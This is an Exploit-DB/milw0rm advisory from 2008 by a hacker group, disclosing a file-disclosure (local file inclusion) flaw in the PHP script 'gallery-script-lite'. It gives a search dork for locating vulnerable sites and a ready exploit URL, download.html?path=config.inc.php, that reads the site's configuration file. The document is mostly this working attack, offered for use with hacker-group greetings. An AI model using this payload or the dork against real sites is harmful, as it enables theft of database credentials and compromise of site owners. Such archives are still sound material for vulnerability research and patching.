Free Photo Gallery Site Script - 'path' File Disclosure

EDB-ID:

5419

Author:

JIKO

Type:

webapps

Platform:

PHP

Published:

2008-04-09

-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : gallery-script-lite
# Bug   : Remote  Local File Inclusion Vulnerability
# Download  : http://www.arwscripts.com/gallery-script-lite.html
# Dork  : developed by ARWScripts.com
# file  : download.html
# Error  :

=========================JIkI Team===================
# Exploit  :
 
  http://[site]/[script]/download.html?path=
#ex   :
 download.html?path=config.inc.php
http://www.xxx.com/demos/galleryscriptlite/download.html?path=config.inc.php
===========
 greetz : all my friend and H-T Team and all No-back members and tryag.Com
 visit: www.no-back.org & www.tryag.com 
-------------------------------------------------------------------------
  --            JIKI Team [ JIKO + KIl1er ]    --
-------------------------------------------------------------------------

# milw0rm.com [2008-04-09]